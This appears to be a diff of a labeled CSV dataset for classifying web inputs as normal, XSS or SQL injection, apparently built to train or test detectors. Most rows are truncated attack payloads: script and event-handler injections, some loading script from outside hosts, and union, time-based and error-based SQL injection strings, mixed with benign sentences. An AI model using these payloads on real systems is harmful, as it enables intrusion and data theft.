+; if not((select serverproperty('isintegratedsecur,2,SQLi,11138 +"1"" ) union all select null,null,null,null--",2,SQLi,14735 +<style>:target {color:red;}</style><tbody id=x sty,1,XSS,6051 +<script onpointerenter=alert(1)>XSS</script>,1,XSS,6635 +"1"" ) ) and ( select * from ( select ( sleep ( 5 ) ",2,SQLi,15098 +"<style>@keyframes slidein {}</style><image style=""",1,XSS,5447 +-1300 ) as rrsm where 1086 = 1086 or 4493 = utl_in,2,SQLi,16070 +"1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,13774 +`'><script>\xE2\x80\x87javascript:alert(522)</scri,1,XSS,8981 +1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +cha,2,SQLi,21407 +La La Land is currently in limited release in sele,0,normal,25916 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,18675 +<option onpointermove=alert(1)>XSS</option>,1,XSS,8564 +select ( case when ( 1093 = 7693 ) then 1093 else ,2,SQLi,20022 +<object id=x onfocus=alert(1) type=text/html>,1,XSS,2550 +select * from users where id = 1 + \+*\ union sele,2,SQLi,11635 "<script src=""javascript:alert(1)"">",1,XSS,643 -1%' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +,2,SQLi,21747 -Select the right palette for the artwork.,0,normal,23991 -"<thead onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,3470 -""")) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11044 -"1"" or ( select 9173 from ( select count ( * ) ,con",2,SQLi,20253 -"<xss class=""carousel slide"" data-ride=carousel dat",1,XSS,143 -"<article onkeypress=""alert(1)"" contenteditable>tes",1,XSS,2399 -"1, ( case when 2872 = 2872 then 1 else null end )",2,SQLi,19824 -<iframe src=http://.rocks/scriptlet.html <,1,XSS,4065 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4782 -<style>:target {color:red;}</style><picture id=x s,1,XSS,1859 -"1%"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 11",2,SQLi,20142 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6580 -"-3347%"" or 9323 = 9323#",2,SQLi,15120 -"<ul onmouseenter=""alert(1)"">test</ul>",1,XSS,3724 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,12536 -select * from users where id = 1 + @<1# union sele,2,SQLi,11931 -"1"" or 7552 = ( select count ( * ) from rdb$fields ",2,SQLi,14470 -a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot,1,XSS,1401 -"<tt onmouseleave=""alert(1)"">test</tt>",1,XSS,3356 +"1 ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,21745 +1' ) ) or 4411 = ( select count ( * ) from sysuser,2,SQLi,21883 +"<meta draggable=""true"" ondrag=""alert(1)"">test</met",1,XSS,3472 +"""))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11046 +"1"" ) as mszg where 6184 = 6184 rlike sleep ( 5 ) -",2,SQLi,15727 +"<xss class=""carousel slide"" data-ride=carousel dat",1,XSS,143 +"<tfoot draggable=""true"" ondrag=""alert(1)"">test</tf",1,XSS,2400 +"1%"" or sleep ( 5 ) and ""%"" = """,2,SQLi,19822 +<style>:target {color:red;}</style><applet id=x st,1,XSS,4067 +"<h1 onmouseenter=""alert(1)"">test</h1>",1,XSS,4784 +"<main onmousedown=""alert(1)"">test</main>",1,XSS,1860 +-9501' ) or 4144 = ( select upper ( xmltype ( chr ,2,SQLi,18921 +"<br onclick=""alert(1)"">test</br>",1,XSS,6582 +"1%"" ) ) ) and sleep ( 5 ) #",2,SQLi,15112 +<em id=x tabindex=1 onactivate=alert(1)></em>,1,XSS,3726 +"-9958"" ) as jzvq where 3741 = 3741 union all selec",2,SQLi,12538 +select * from users where id = '1' or !<@ or 1 = 1,2,SQLi,11933 +"-5863"" or 4144 = ( select upper ( xmltype ( chr ( ",2,SQLi,14472 +&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;aler,1,XSS,1402 +"<li onclick=""alert(1)"">test</li>",1,XSS,3358 "<a href=""\x08javascript:javascript:alert(1)"" id=""f",1,XSS,522 -"<tt draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,7860 -<tr onpointerout=alert(1)>XSS</tr>,1,XSS,4031 -"1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'miir'",2,SQLi,13028 -Select a quote to inspire others.,0,normal,24094 -"{""id"":null,""firstName"":""Nguan Eng"",""lastName"":""Tan",0,normal,26817 -"{""id"":null,""firstName"":""Nickson"",""lastName"":""Bingl",0,normal,27149 -1' ) ) as qgyz where 1547 = 1547 and 8594 = ( sele,2,SQLi,13057 -Select your evolve.,0,normal,25034 -select sleep ( 5 ) and ( '%' = ',2,SQLi,16943 -"{""id"":null,""name"":""Roggenrola""}",0,normal,27322 -"{""id"":null,""firstName"":""Nurul"",""lastName"":""Asyikin",0,normal,27586 -1' ) where 3450 = 3450 and 8312 = dbms_pipe.receiv,2,SQLi,17196 -"1 ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,14456 -"Tap the ""SELECT MULTIPLE"" button with the overlapp",0,normal,25503 -"1"" or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,12937 -"<scRiPt y=""><"">/*<sCRipt* */prompt()</script",1,XSS,9250 -"Except in the case of a select few, Irving's preac",0,normal,26207 -1' ) ) as qwdh where 7581 = 7581 or char ( 117 ) |,2,SQLi,15335 -"-9837"" where 7201 = 7201 union all select 7201,720",2,SQLi,18462 -"1"" ) ) as wfne where 8933 = 8933",2,SQLi,21105 +"<style>@keyframes x{}</style><dd style=""animation-",1,XSS,7862 +<menu onblur=alert(1) tabindex=1 id=x></menu><inpu,1,XSS,4033 +"1"" where 4633 = 4633 and char ( 120 ) ||char ( 106",2,SQLi,13030 +Select a book for your book club.,0,normal,24091 +"{""id"":null,""name"":""Electrode""}",0,normal,26814 +"{""id"":null,""name"":""Mastemon""}",0,normal,27147 +1%' ( select ( case when ( 5451 = 5451 ) then rege,2,SQLi,13059 +Select your grow.,0,normal,25031 +1 ) as asmt where 4986 = 4986 union all select nul,2,SQLi,16941 +"Instead of having hand controllers, users select i",0,normal,25983 +Update feed.,0,normal,23041 +"1%"" and 6537 = dbms_pipe.receive_message ( chr ( 7",2,SQLi,17194 +1'+ ( select yfuu where 1717 = 1717 union all sele,2,SQLi,14458 +"Tap Select, and then at the bottom tap Delete All.",0,normal,25500 +1%' ) or 5286 = ( select count ( * ) from all_user,2,SQLi,12939 +<script itworksinallbrowsers>/*<script* */alert(1),1,XSS,9252 +"Extra $50 off select Inspiron & XPS PCs $699+ w/ """,0,normal,26204 +1%' ) ) ) and 7533 = 7533 and ( ( ( '%' = ',2,SQLi,15327 +1'+ ( select ummn where 8883 = 8883 and 4241 = con,2,SQLi,18460 +-9581 ) as jkqo where 5200 = 5200 or 6872 = 6872--,2,SQLi,21103 //|\\ <script //|\\ src='https://dl.dropbox.com/u/,1,XSS,873 -<button onMouseDown=javascript:alert(1)>,1,XSS,9631 -1' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ,2,SQLi,13897 -Select your role.,0,normal,24852 -<svg><output onload=alert(1)></output>,1,XSS,6659 -Update your email signature with flair.,0,normal,22953 -<param id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,6029 -<abbr onpointerdown=alert(1)>XSS</abbr>,1,XSS,4232 -"1%"" ) ) ) rlike sleep ( 5 ) #",2,SQLi,19561 +<button onMouseLeave=javascript:alert(1)>,1,XSS,9633 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,13899 +Order a pepperoni pizza.,0,normal,22606 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6661 +Update your profile details.,0,normal,22691 +<sub id=x tabindex=1 onfocusin=alert(1)></sub>,1,XSS,6031 +<menuitem onpointerout=alert(1)>XSS</menuitem>,1,XSS,4234 +1' ) ) and 3355 = 6012 and ( ( 'ofmy' = 'ofmy,2,SQLi,20099 "<SCRIPT ""a='>'"" SRC=""httx://xss.rocks/xss.js""></SC",1,XSS,307 -select Comfort had done it in beds.,0,normal,25636 -1′) and '1′='1–,2,SQLi,9946 -Where's the mountain cabin?,0,normal,23556 -Sort alphabetically.,0,normal,22767 -1' ) rlike ( select ( case when ( 9308 = 2540 ) th,2,SQLi,21393 -"<frameset onpaste=""alert(1)"" contenteditable>test<",1,XSS,2277 -1'+ ( select hspl where 4530 = 4530 and 9660 = ( s,2,SQLi,15489 -"<ol onmouseover=""alert(1)"">test</ol>",1,XSS,2539 -<td onpointerup=alert(1)>XSS</td>,1,XSS,5182 -select,0,normal,26602 -1' ) ) as hbdi where 6758 = 6758 and elt ( 1210 = ,2,SQLi,18905 -<svg><spacer onload=alert(1)></spacer>,1,XSS,1925 -1'+ ( select 'mgrj' where 8514 = 8514 or row ( 104,2,SQLi,16298 -"-7531' ) ) ) union all select 6900,6900,6900,6900,",2,SQLi,18843 -"{""id"":null,""firstName"":""Stephan"",""lastName"":""Toh"",",0,normal,27162 -"-6854"" where 7794 = 7794 union all select 7794,779",2,SQLi,16223 -I'm considering where to volunteer this weekend.,0,normal,23826 -"<style>@keyframes x{}</style><mark style=""animatio",1,XSS,6209 -javascript://</title></style></textarea>--></scrip,1,XSS,9544 -"if(now()=sysdate(),sleep(3),0)/XOR(if(now()=sysdat",2,SQLi,11371 -1 ) and ( 3020 = 3020 ) *6703,2,SQLi,17560 -1%' and 3707 = ( select count ( * ) from sysibm.sy,2,SQLi,21399 -"<dir draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5162 -"1%' union all select null,null#",2,SQLi,16327 -"<XML SRC=""http://ha.ckers.org/xsstest.xml"" ID=I></",1,XSS,9059 -"<style>@keyframes x{}</style><td style=""animation-",1,XSS,5820 -Select the right pieces and your character will fe,0,normal,25582 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,15574 -"<A HREF=""http://0x42.0x0000066.0x7.0x93/""></A>",1,XSS,4302 -1%' ) ) and 8189 = ( select count ( * ) from sysib,2,SQLi,17362 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19397 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10642 -1 ) where 5464 = 5464 or 1022 = ( select count ( *,2,SQLi,21831 -"feed:data:text/html,&#x3c;script>alert('Top Page L",1,XSS,9378 -"1%' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x69",2,SQLi,17670 -Select project team Work with specialist support w,0,normal,25613 -"<spacer draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,5937 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10457 +"1"" ) where 3390 = 3390",2,SQLi,16072 +"AND 1=0 UNION ALL SELECT "", 81dc9bdb52d04dc20036db",2,SQLi,9948 +Where's the RV park?,0,normal,23553 +"The discrepancies produced in this way are, howeve",0,normal,25459 +1'+ ( select hkrg where 3665 = 3665,2,SQLi,21391 +<td onblur=alert(1) tabindex=1 id=x></td><input au,1,XSS,2278 +"-7553%"" or 3571 = 2886",2,SQLi,15481 +<textarea oncopy=alert(1) autofocus>XSS</textarea>,1,XSS,2540 +<style>@keyframes slidein {}</style><fieldset styl,1,XSS,5184 +"{""id"":null,""name"":""Hippowdon""}",0,normal,26916 +-8032%' ) ) ) or 9323 = 9323#,2,SQLi,18903 +"<nav oncopy=""alert(1)"" contenteditable>test</nav>",1,XSS,1926 +select current_setting('krb_server_keyfile');,2,SQLi,22508 +1 ) where 1203 = 1203 rlike ( select * from ( sele,2,SQLi,16616 +"-2178' ) ) ) or elt ( 3421 = 2899,2899 ) and ( ( (",2,SQLi,16920 +He selected a color for his new bedroom.,0,normal,23789 +Where did you get that fantastic idea from?,0,normal,23823 +"<hr onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,6211 +javascript://</title></textarea></style></script -,1,XSS,9546 +create user name identified by pass123 temporary t,2,SQLi,11373 +1 where 5828 = 5828 and ( 3020 = 3020 ) *6703--,2,SQLi,17558 +-9840 ) ) as thod where 4790 = 4790 or 1570 = conv,2,SQLi,17240 +"<div onclick=""alert(1)"">test</div>",1,XSS,5164 +select ( case when ( 8362 = 7572 ) then 8362 else ,2,SQLi,16318 +"<a class=bar href=""http://www.example.org"">www.exa",1,XSS,9061 +"<tfoot draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,5822 +Select the style that works for you and that suits,0,normal,25579 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,20209 +"<font ondblclick=""alert(1)"">test</font>",1,XSS,4304 +"1"" ) ) or 7552 = ( select count ( * ) from rdb$fie",2,SQLi,17849 +is,0,normal,23238 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10644 +Where did you find that adorable puppy?,0,normal,23721 +"getURL(""javascript:alert('XSS')"")",1,XSS,9380 +"-3283 ) where 1948 = 1948 union all select 1948,19",2,SQLi,17668 +"1"" ) ) as vbdo where 3882 = 3882",2,SQLi,17174 +"<noframes onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5939 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10459 "<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")",1,XSS,261 -1%' and 8189 = ( select count ( * ) from sysibm.sy,2,SQLi,20443 -1'|| ( select 'hafu' where 6226 = 6226,2,SQLi,16250 -1' ) ) as pdcl where 6964 = 6964,2,SQLi,18015 -select ( case when ( 5856 = 7176 ) then 5856 else ,2,SQLi,20748 -Where's the train station?,0,normal,23501 -"&lt;IMG SRC=\"" javascript&#058;alert('XSS');\""&gt;",1,XSS,1092 -1 ) where 9344 = 9344,2,SQLi,17076 -<plaintext onpointerover=alert(1)>XSS</plaintext>,1,XSS,6932 -<hgroup id=x tabindex=1 ondeactivate=alert(1)></hg,1,XSS,4650 --5299 or 2724 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,19729 -Select post.,0,normal,24702 -Create a striking masterpiece.,0,normal,22729 -<sup id=x tabindex=1 onfocusin=alert(1)></sup>,1,XSS,6001 -"<menuitem onpaste=""alert(1)"" contenteditable>test<",1,XSS,7143 -<%78 onxxx=1,1,XSS,9026 -><script src=data:&comma;alert(1)//,1,XSS,8962 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,18400 -alert(1)//,1,XSS,9445 -1'|| ( select 'bezt' where 7876 = 7876,2,SQLi,20569 -"1"" ) as jqli where 7793 = 7793",2,SQLi,18745 -"-9751"" ) ) ) or 5929 = 3884--",2,SQLi,17800 -1 ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) ,2,SQLi,20087 -<deTAiLs/open/oNtoGGle=confirm()>,1,XSS,9091 -1' ) ) as ngoo where 8641 = 8641 and 5556 = ( sele,2,SQLi,13414 -"( select * from generate_series ( 4990,4990,case w",2,SQLi,13464 +"1"" and 5556 = ( select count ( * ) from all_users ",2,SQLi,20441 +1 ) ) as prnp where 4932 = 4932 or char ( 68 ) ||c,2,SQLi,15753 +1%' ) and 6969 = ( select 6969 from pg_sleep ( 5 ),2,SQLi,18013 +1%' and 8635 = ( select count ( * ) from generate_,2,SQLi,19355 +Where's the subway station?,0,normal,23498 +"perl -e 'print \""&lt;SCR\0IPT&gt;alert(\\""XSS\\"")&",1,XSS,1093 +"1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,20826 +"<style>@keyframes x{}</style><source style=""animat",1,XSS,6934 +"<style onmouseenter=""alert(1)"">test</style>",1,XSS,4652 +Join the team for lunch.,0,normal,22557 +Select send.,0,normal,24699 +Merge the project teams.,0,normal,22726 +<nobr onpointermove=alert(1)>XSS</nobr>,1,XSS,6003 +"<button oncontextmenu=""alert(1)"">test</button>",1,XSS,7145 +"</ foo=""><script>alert(91)</script>"">",1,XSS,9028 +`'><script>-javascript:alert(518)</script>,1,XSS,8964 +-6020'+ ( select isrz where 2489 = 2489 union all ,2,SQLi,21945 +javascript:javascript:alert(1),1,XSS,9447 +"1"" ) as hfgk where 1100 = 1100 or char ( 119 ) ||c",2,SQLi,20567 +"1,iif ( 6333 = 1227,1,1/0 )",2,SQLi,18743 +Select dislike.,0,normal,24743 +"1' where 8437 = 8437 and make_set ( 8403 = 8403,88",2,SQLi,20085 +"<div style=""position:absolute;top:0;left:0;width:1",1,XSS,9093 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,13416 +1 and 5556 = ( select count ( * ) from all_users t,2,SQLi,13466 "<a href=""\x02javascript:javascript:alert(1)"" id=""f",1,XSS,533 -"<iframe onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2418 -"<style>@keyframes x{}</style><nextid style=""animat",1,XSS,4042 -"<q draggable=""true"" ondrag=""alert(1)"">test</q>",1,XSS,4677 -"<ruby onmousedown=""alert(1)"">test</ruby>",1,XSS,2922 -1' where 7910 = 7910,2,SQLi,20664 -<frameset id=x tabindex=1 onfocusin=alert(1)></fra,1,XSS,2250 -<p onpointerup=alert(1)>XSS</p>,1,XSS,5480 -1'+ ( select 'vtyw' where 7950 = 7950 order by 1--,2,SQLi,17939 -"&lt;A HREF=\""http&#58;//1113982867/\""&gt;XSS&lt;/A",1,XSS,1051 -"I, meanwhile, have been able to select and shed ha",0,normal,26064 -select sleep ( 5 ) --,2,SQLi,17649 -<svg id=`x`onload=alert(1)>,1,XSS,9458 -"<iframe src=data:text/html,%3C%73%63%72%69%70%74%3",1,XSS,1719 -"<meter draggable=""true"" ondrag=""alert(1)"">test</me",1,XSS,5274 -"-7579%"" or 6570 = 1764",2,SQLi,20100 -"-9881"" ) ) or 9850 = 8118#",2,SQLi,12385 -<source onpointerup=alert(1)>XSS</source>,1,XSS,2460 -1'|| ( select 'cqjw' from dual where 7335 = 7335 a,2,SQLi,13486 -"<cite ondblclick=""alert(1)"">test</cite>",1,XSS,6794 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10548 -"<nobr draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,8622 -1 and sleep(5),2,SQLi,11159 -Specify conditions where useful.,0,normal,23372 -"-6595"" order by 1--",2,SQLi,16917 -"1"" procedure analyse ( extractvalue ( 9627,concat ",2,SQLi,16416 -Careful selection.,0,normal,24785 -"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,21867 -1'+ ( select iaeu where 5509 = 5509 or 8514 = benc,2,SQLi,22125 +"<menuitem onkeypress=""alert(1)"" contenteditable>te",1,XSS,2419 +"<center oncopy=""alert(1)"" contenteditable>test</ce",1,XSS,4044 +"<abbr onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,4679 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2923 +"-7889"" ) ) as oayf where 1765 = 1765 or 8571 = 857",2,SQLi,20662 +"<bdo oncopy=""alert(1)"" contenteditable>test</bdo>",1,XSS,2251 +<acronym onfocusout=alert(1) tabindex=1 id=x></acr,1,XSS,5482 +1 ) where 1079 = 1079,2,SQLi,17937 +"&lt;A HREF=\""http&#58;//0x42&#46;0x0000066&#46;0x7",1,XSS,1052 +"{""id"":null,""name"":""Swoobat""}",0,normal,27229 +Where's the festival?,0,normal,23585 +"</title><script>$=1,alert($)</script>",1,XSS,9460 +"�;alert(String.fromCharCode(88,83,83))//�;alert(St",1,XSS,1720 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5276 +Select the perfect outfit.,0,normal,24300 +"-4817 union all select 7415,7415,7415,7415,7415,74",2,SQLi,12387 +"<xmp onmouseover=""alert(1)"">test</xmp>",1,XSS,2461 +select ( case when ( 2394 = 4530 ) then 2394 else ,2,SQLi,13488 +"<details onmouseleave=""alert(1)"">test</details>",1,XSS,6796 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10550 +"<blink onmouseup=""alert(1)"">test</blink>",1,XSS,8624 +and sleep 5,2,SQLi,11161 +Select where it counts.,0,normal,23369 +1 ) where 6950 = 6950 rlike ( select * from ( sele,2,SQLi,16915 +1 ) where 6035 = 6035,2,SQLi,16414 +Please select one.,0,normal,24782 +1%' ) and 4595 = 4595#,2,SQLi,18018 +1'+ ( select goec where 9460 = 9460 rlike ( select,2,SQLi,22123 "<TABLE><TD BACKGROUND=""javascript:javascript:alert",1,XSS,760 -"1' or ( select 9173 from ( select count ( * ) ,con",2,SQLi,18977 -"1"" ) where 8254 = 8254 and char ( 107 ) ||char ( 1",2,SQLi,16828 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5488 -1'|| ( select 'uqbj' from dual where 6736 = 6736 o,2,SQLi,13450 -<frame onblur=alert(1) tabindex=1 id=x></frame><in,1,XSS,3339 -1,0,normal,26645 -)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) A,2,SQLi,11201 -And you select objects and life forms to go in.,0,normal,26361 -<svg><menuitem onload=alert(1)></menuitem>,1,XSS,6061 -or a = a--,2,SQLi,11943 -"iif ( 3548 = 8646,1,1/0 )",2,SQLi,19272 -"<rb onclick=""alert(1)"">test</rb>",1,XSS,6622 -1%' rlike sleep ( 5 ) #,2,SQLi,14046 -<style>:target {color:red;}</style><h1 id=x style=,1,XSS,4349 -Filter data where required.,0,normal,23474 -<main id=x tabindex=1 onactivate=alert(1)></main>,1,XSS,7471 -"<th onmouseleave=""alert(1)"">test</th>",1,XSS,3692 -"<noframes oncut=""alert(1)"" contenteditable>test</n",1,XSS,5768 -1' ) as eymt where 3911 = 3911 or 4411 = ( select ,2,SQLi,12691 -"<table onkeydown=""alert(1)"" contenteditable>test</",1,XSS,4396 -"<figure onmouseup=""alert(1)"">test</figure>",1,XSS,6206 -<nav onpointerenter=alert(1)>XSS</nav>,1,XSS,2904 -<isindex onpointerup=alert(1)>XSS</isindex>,1,XSS,1840 -1' or 2633 = dbms_pipe.receive_message ( chr ( 112,2,SQLi,12187 -1 ) as cinw where 3732 = 3732 and 8594 = ( select ,2,SQLi,15522 -Select a toy.,0,normal,24828 -"1%"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||c",2,SQLi,20743 -1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,21102 -"<content onbeforecut=""alert(1)"" contenteditable>te",1,XSS,6759 -"<colgroup onmouseenter=""alert(1)"">test</colgroup>",1,XSS,3340 -"<time onpaste=""alert(1)"" contenteditable>test</tim",1,XSS,5213 -"J. Crew: Take 5003 percent off select styles, thro",0,normal,25936 -"{""id"":null,""firstName"":""Jayden"",""lastName"":""Goh"",""",0,normal,27485 -1 ) or 4411 = ( select count ( * ) from sysusers a,2,SQLi,16191 +1 ) ) as wajy where 8593 = 8593,2,SQLi,16778 +"-9496 ) ) ) or elt ( 7511 = 3951,3951 ) and ( ( ( ",2,SQLi,16826 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5490 +-9076'+ ( select lqvj where 8551 = 8551 union all ,2,SQLi,13452 +"<form onmouseout=""alert(1)"">test</form>",1,XSS,3341 +select,0,normal,26642 +AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ,2,SQLi,11203 +Select your barter.,0,normal,25051 +"<dir onmouseover=""alert(1)"">test</dir>",1,XSS,6063 +"select * from users where id = 1 or ""1{"" or 1 = 1 ",2,SQLi,11945 +"1 or 8384 = like ( 'abcdefg',upper ( hex ( randomb",2,SQLi,20467 +<select id=x tabindex=1 onactivate=alert(1)></sele,1,XSS,6624 +1 ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) |,2,SQLi,14048 +"<cite draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4351 +Where to execute the query?,0,normal,23471 +"<spacer onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,7473 +<code onpointerdown=alert(1)>XSS</code>,1,XSS,3694 +"<em oncut=""alert(1)"" contenteditable>test</em>",1,XSS,5770 +"1' ) where 8211 = 8211 union all select null,null,",2,SQLi,12693 +<input type=image onloadstart=alert(1) src=validim,1,XSS,4398 +"<bdi draggable=""true"" ondrag=""alert(1)"">test</bdi>",1,XSS,6208 +<datalist onpointerup=alert(1)>XSS</datalist>,1,XSS,2905 +"<strike onmouseup=""alert(1)"">test</strike>",1,XSS,1841 +"-3721' ) union all select 9050,9050--",2,SQLi,12189 +Sheep and cattle given a free choice between peren,0,normal,25556 +Select your weapon.,0,normal,24825 +"-8699"" ) union all select 8645,8645,8645,8645,8645",2,SQLi,20381 +The hard-boiled and peeled eggs were sold in pails,0,normal,25434 +<progress id=x tabindex=1 onfocus=alert(1)></progr,1,XSS,6761 +"<picture draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,3342 +"<command draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,5215 +1%' ) ) ) rlike ( select * from ( select ( sleep (,2,SQLi,22053 +1%' ) ) ) and 6510 = ( select count ( * ) from sys,2,SQLi,21219 +1' ) ) ) or sleep ( 5 ) #,2,SQLi,16183 <body onscroll=javascript:alert(1)><br><br><br><br,1,XSS,621 -"<;<;SCRIPT>;alert("";XSS"";);//<;<;/SCRIPT>;",1,XSS,1657 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2629 -revoke,0,normal,23168 -Can't select that.,0,normal,24421 -"1"" ) as tecq where 4817 = 4817 and 8189 = ( select",2,SQLi,14701 -1'+ ( select mcfb where 4050 = 4050 or 9643 = ( se,2,SQLi,18425 -"""),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20dela",2,SQLi,10904 -1'+ ( select bptu where 7356 = 7356 ( select ( cas,2,SQLi,19683 -"<dl onmouseout=""alert(1)"">test</dl>",1,XSS,2000 -"select * from generate_series ( 7536,7536,case whe",2,SQLi,15345 -1' ) where 8252 = 8252 or 8514 = benchmark ( 50000,2,SQLi,21971 -<style>:target {color: red;}</style><th id=x style,1,XSS,3882 -1%' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,17951 -"{""id"":null,""firstName"":""Nazierul Haqeem"",""lastName",0,normal,27211 -"-7553%"" or 3571 = 2886",2,SQLi,15481 -Merck's PM approach to select patients may have ma,0,normal,25879 -"<big onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,4216 -1 ) ) or sleep ( 5 ) and ( ( 8285 = 8285,2,SQLi,13474 -"-9772' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,14788 -1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,13462 -"-8355%"" ) ) ) union all select 3004,3004,3004,3004",2,SQLi,21620 -That additional money goes to select charities sup,0,normal,25495 -select * from users where id = 1 or \<$ or 1 = 1 -,2,SQLi,11515 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7225 -<<SCRIPT>alert(�XSS�);//<</SCRIPT>,1,XSS,1724 -<dt onpointerdown=alert(1)>XSS</dt>,1,XSS,5748 -"<ul draggable=""true"" ondrag=""alert(1)"">test</ul>",1,XSS,6105 -Select adjust.,0,normal,24613 -<frameset id=x tabindex=1 onbeforedeactivate=alert,1,XSS,8815 -<video onfocusout=alert(1) tabindex=1 id=x></video,1,XSS,2408 -"1%"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 1",2,SQLi,22357 -<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul,1,XSS,3466 -1' ) ) ) or sleep ( 5 ) and ( ( ( 'wuwv' = 'wuwv,2,SQLi,21437 -"There will be extended hours on select dates, incl",0,normal,25327 -",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%",2,SQLi,10898 -pg_sleep(5)--,2,SQLi,10364 -"{""id"":null,""name"":""continent""}",0,normal,27249 -"1 ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,19142 +"<;IMG "";"";"";>;<;SCRIPT>;alert("";XSS"";)<;/SCRIPT>;""",1,XSS,1658 +<span onblur=alert(1) tabindex=1 id=x></span><inpu,1,XSS,2630 +rollback,0,normal,23165 +"Please, select wisely.",0,normal,24418 +"1 ) or ( select 9173 from ( select count ( * ) ,co",2,SQLi,14703 +1 where 5311 = 5311 rlike ( select * from ( select,2,SQLi,18423 +",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20d",2,SQLi,10906 +"-8046"" ) ) ) union all select 3126,3126,3126,3126,",2,SQLi,22337 +"<command onmouseleave=""alert(1)"">test</command>",1,XSS,2001 +1'+ ( select 'asmj' where 7808 = 7808 or 2633 = db,2,SQLi,15337 +-8463 ) ) ) or 4861 = 9834#,2,SQLi,21969 +"<main draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,3884 +1 ) as ryks where 1196 = 1196,2,SQLi,17949 +"{""id"":null,""firstName"":""Damien"",""lastName"":""Goh"",""",0,normal,27209 +"-1503"" order by 1--",2,SQLi,22346 +1'+ ( select dklj where 3265 = 3265,2,SQLi,18626 +<plaintext onfocusout=alert(1) tabindex=1 id=x></p,1,XSS,4218 +"iif ( 5462 = 8866,1,1/0 )",2,SQLi,13476 +1 ) where 7729 = 7729,2,SQLi,14790 +"( select * from generate_series ( 4990,4990,case w",2,SQLi,13464 +Let him select a route for you and then suggest an,0,normal,25910 +"1"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ",2,SQLi,15758 +admin' or 1 = 1/*,2,SQLi,11517 +"<dfn onpaste=""alert(1)"" contenteditable>test</dfn>",1,XSS,7227 +�><s�%2b�cript>alert(document.cookie)</script>,1,XSS,1725 +"<td onpaste=""alert(1)"" contenteditable>test</td>",1,XSS,5750 +"<noscript onmousemove=""alert(1)"">test</noscript>",1,XSS,6107 +Select change.,0,normal,24610 +"<strong 